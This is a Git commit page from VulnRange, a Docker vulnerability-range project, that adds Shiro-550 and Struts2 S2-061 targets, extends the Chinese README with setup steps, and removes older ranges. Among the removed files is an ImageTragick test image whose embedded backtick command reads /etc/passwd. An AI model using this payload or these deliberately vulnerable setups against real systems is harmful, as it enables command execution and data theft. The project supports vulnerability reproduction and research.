wgpsec/VulnRange
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

添加Shiro靶机和S2-061靶机以及修改说明文档

Browse Source
This commit is contained in:
wintrysec
2020-12-14 17:35:19 +08:00
parent 011298178b
commit 3ec426e745
18 changed files with 89 additions and 185 deletions
Download Patch File Download Diff File Expand all files Collapse all files

70
README.md
View File

@@ -1,26 +1,81 @@
> **VulnRange的定位是一个漏洞靶场用于快速的启动漏洞环境便于漏洞复现和研究**
使用VulnRange可以快速的部署含有未修复漏洞的Shiro和S2等第三方组件的测试环境方便复现漏洞。
# 安装部署🚀
## 注意事项
> 1. 项目需要放到 `~/` 当前用户目录下
> 2. ubuntu 需要将`start.sh`中的`~/`改为绝对路径,如`/home/ubuntu`
> 3. 关闭Linux防火墙后请重启docker
> 4. python使用python3.8以上版本
> 5. 不建议部署在VPS上小心被人GetShell
## 环境配置
**以Centos为例**
1、[Centos安装python3.8和PIP](https://www.cnblogs.com/wintrysec/p/11963807.html)
1、Centos安装python3.8和PIP
```bash
#安装python3.8
yum -y install yum-utils
yum-builddep python
curl -O https://www.python.org/ftp/python/3.8.0/Python-3.8.0.tgz
tar xf Python-3.8.0.tgz
cd Python-3.8.0
./configure
make
make install
#设置python3.8为默认版本
vi /etc/profile.d/python.sh #编辑用户自定义配置输入alias参数
alias python='/usr/local/bin/python3.8'  #这里写你的python路径
source /etc/profile.d/python.sh #重启会话使配置生效
#安装pip
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py -i https://pypi.tuna.tsinghua.edu.cn/simple/
```
2、安装docker和docker-compose [把docker源换掉推荐阿里云的源]
```bash
#安装docker
yum install -y yum-utils # yum-config-manager需要用这个包
yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo #安装docker官方源
yum makecache
yum -y install docker-ce
systemctl start docker
#安装docker-compose
pip install docker-compose -i https://pypi.mirrors.ustc.edu.cn/simple/
```
更换阿里源:[阿里云帮助手册](https://help.aliyun.com/document_detail/60750.html?spm=a2c4g.11186623.6.553.4851242foO76sC),用淘宝账号登陆后获取一个独有的加速地址
3、关闭防火墙和SELinux
```bash
firewall-cmd --state #查看防火墙状态
systemctl stop firewall.service #停止防火墙
systemctl disable firewall.service #禁止开机启动
vim /etc/selinux/config/
#修改为以下内容
SELINUX=disabled
#然后最好重启一下系统
```
## 下载安装VulnRange
```bash
git clone https://github.com/wgpsec/VulnRange.git
cd VulnRange
pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple/ #安装项目
pip install Flask #自动安装完启动项目Flask报错后更新pip 从新安装Flask即可
pip install Flask #自动安装完启动项目Flask报错后更新pip安装Flask
```
# 功能介绍:memo:
@@ -60,10 +115,3 @@ sh start.sh
靶机环境构建完成后,点击链接即可访问
![](README/image-20200921222813545.png)
# 注意事项
> 1. 项目需要放到 `~/` 当前用户目录下
> 2. ubuntu 需要将`start.sh`中的`~/`改为绝对路径,如`/home/ubuntu`
> 3. 关闭Linux防火墙后请重启docker

7
Ranges/Apache/Apache-Shiro/Shiro-550/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
version: '3'
services:
web:
image: vulhub/shiro:1.2.4
container_name: Shiro-550
ports:
- "8080"

16
Ranges/Cgi/CVE-2016-5385/docker-compose.yml
View File

@@ -1,16 +0,0 @@
version: '2'
services:
nginx:
image: nginx:1
container_name: CVE-2016-5385
volumes:
- ./www/index.php:/usr/share/nginx/html/index.php
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
depends_on:
- php
ports:
- "80"
php:
image: vulhub/php:httpoxy
volumes:
- ./www/index.php:/var/www/html/index.php

26
Ranges/Cgi/CVE-2016-5385/nginx/default.conf
View File

@@ -1,26 +0,0 @@
server {
listen 80 default_server;
listen [::]:80 default_server;
root /usr/share/nginx/html;
index index.html index.php;
server_name _;
location / {
try_files $uri $uri/ =404;
}
location ~ [^/]\.php(/|$) {
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
fastcgi_param DOCUMENT_ROOT /var/www/html;
fastcgi_pass php:9000;
}
}

20
Ranges/Cgi/CVE-2016-5385/www/index.php
View File

@@ -1,20 +0,0 @@
<?php
require __DIR__ . '/vendor/autoload.php';
use GuzzleHttp\Client;
header('Content-Type: application/json; charset=utf-8');
$client = new Client([
// Base URI is used with relative requests
'base_uri' => 'http://httpbin.org',
// You can set any number of default request options.
'timeout' => 2.0,
]);
$response = $client->get('http://httpbin.org/get');
$body = $response->getBody();
echo $body;

14
Ranges/Confluence/CVE-2019-3396/docker-compose.yml
View File

@@ -1,14 +0,0 @@
version: '2'
services:
web:
image: vulhub/confluence:6.10.2
container_name: CVE-2019-3369
ports:
- "8090:8090"
depends_on:
- db
db:
image: postgres:10.7-alpine
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=confluence

13
Ranges/Ecshop/ecshop-3.6.0/docker-compose.yml
View File

@@ -1,13 +0,0 @@
version: '2'
services:
ecshop36:
image: vulhub/ecshop:3.6.0
container_name: ecshop-3.6.0
depends_on:
- mysql
ports:
- "80"
mysql:
image: mysql:5.5
environment:
- MYSQL_ROOT_PASSWORD=root

7
Ranges/Struts2/s2-061/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
version: '3'
services:
struts2:
image: vulhub/struts2:2.5.25
container_name: s2-061
ports:
- "8080"

17
Ranges/Supervisor/CVE-2017-11610/Dockerfile
View File

@@ -1,17 +0,0 @@
FROM vulhub/python:2.7
MAINTAINER phithon <root@leavesongs.com>
COPY docker-entrypoint.sh /usr/local/bin/
RUN pip install -U pip \
&& pip install "supervisor==3.3.2" \
&& echo_supervisord_conf | tee /usr/local/etc/supervisord.conf \
&& { \
echo "[inet_http_server]"; \
echo "port=0.0.0.0:9001"; \
echo; \
} | tee -a /usr/local/etc/supervisord.conf \
&& chmod +x /usr/local/bin/docker-entrypoint.sh
CMD ["/usr/local/bin/docker-entrypoint.sh"]

7
Ranges/Supervisor/CVE-2017-11610/docker-compose.yml
View File

@@ -1,7 +0,0 @@
version: '3'
services:
web:
build: .
container_name: CVE-2017-11610
ports:
- "9001:9001"

5
Ranges/Supervisor/CVE-2017-11610/docker-entrypoint.sh
View File

@@ -1,5 +0,0 @@
#!/bin/bash
supervisord --user nobody -c /usr/local/etc/supervisord.conf
while true; do sleep 30; done;

5
Ranges/imagemagick/CVE-2016–3714/Dockerfile
View File

@@ -1,5 +0,0 @@
FROM vulhub/imagemagick:6.9.2
MAINTAINER phithon <root@leavesongs.com>
RUN sed -i -e "s/Options -Indexes/Options +Indexes/g" $APACHE_CONFDIR/conf-available/docker-php.conf

9
Ranges/imagemagick/CVE-2016–3714/docker-compose.yml
View File

@@ -1,9 +0,0 @@
version: '3'
services:
apache:
build: .
container_name: CVE-20163714
volumes:
- ./www:/var/www/html
ports:
- "80"

2
Ranges/imagemagick/CVE-2016–3714/www/demo.php
View File

@@ -1,2 +0,0 @@
<?php
echo shell_exec("/usr/local/bin/identify vul.jpg");

23
Ranges/imagemagick/CVE-2016–3714/www/upload.php
View File

@@ -1,23 +0,0 @@
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$i = new Imagick($_FILES['file_upload']['tmp_name']);
$size = $i->getSize();
echo "Image size is: ";
print_r($size);
else:
?>
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
<?php
endif;

4
Ranges/imagemagick/CVE-2016–3714/www/vul.jpg
View File

@@ -1,4 +0,0 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`cat /etc/passwd > /tmp/success`'
pop graphic-context

27
flaskr/templates/index/welcome.html
View File

@@ -34,6 +34,15 @@
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://go.wgpsec.org/" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">渗透测试导航</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wgpsec/WolfAwd" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
@@ -42,30 +51,24 @@
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wgpsec/Perception" target="_blank" class="x-admin-backlog-body">
<a href="https://github.com/wgpsec/urlscan" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">Perception</cite>
<cite style="font-size: medium">UrlScan</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wintrysec/webcracker" target="_blank" class="x-admin-backlog-body">
<h3>黎焰攻防实验室</h3>
<a href="https://github.com/wintrysec/WebBrute" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">Web后台批量爆破</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://dawnflame.github.io/" target="_blank" class="x-admin-backlog-body">
<h3>黎焰攻防实验室</h3>
<p>
<cite style="font-size: medium">渗透测试导航</cite>
</p>
</a>
</li>
</ul>
</div>

BIN
instance/flaskr.sqlite
View File

Binary file not shown.